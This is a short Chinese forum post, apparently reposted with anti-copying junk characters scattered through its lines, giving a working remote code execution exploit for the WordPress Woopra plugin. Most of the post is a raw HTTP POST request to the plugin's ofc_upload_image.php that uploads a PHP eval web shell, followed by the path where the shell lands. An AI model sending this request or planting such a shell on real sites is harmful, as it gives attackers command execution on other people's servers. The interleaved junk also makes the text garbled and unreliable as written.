|
照例e文装逼 WordPress Woopra Remote Code Execution:http://www.wordpress-secure.org/ ... ote-code-execution/
. x- |. |" j4 }" n# T- Q此漏洞对Woopra 1.4.3.1以上版本无效。 插件下载地址: http://downloads.wordpress.org/plugin/woopra.1.4.3.1.zip
1 a5 w! I# N% ?1 J4 A4 lexp发包: POST /wordpress/3.5.1_CN/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php?name=11.php HTTP/1.1
- {4 k$ m4 ]5 K, s# k& IHost: ha.cker.in% V! x$ U! r3 G) R0 e* @; B
Proxy-Connection: keep-alive8 l+ Y$ C( U7 A/ m0 F
Cache-Control: max-age=0% p: M3 j! m, h' w7 f+ P
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
, q8 b( q0 b" lUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1478.0 Safari/537.36$ O1 D& }8 l1 J/ k) ]. ~
Accept-Encoding: gzip,deflate,sdch
( \" l# U/ u) ]; ?Accept-Language: zh-CN,zh;q=0.8
% ~9 j6 D* q9 I- z; V; }5 \; AContent-Length: 28 <?php eval($_POST['cmd']); ?>
' R( C$ }! D# [上传的文件在http://ha.cker.in/wordpress/3.5. ... pload-images/11.php
$ Q8 s0 i6 p4 h7 M, E/ L# x( G+ B3 P |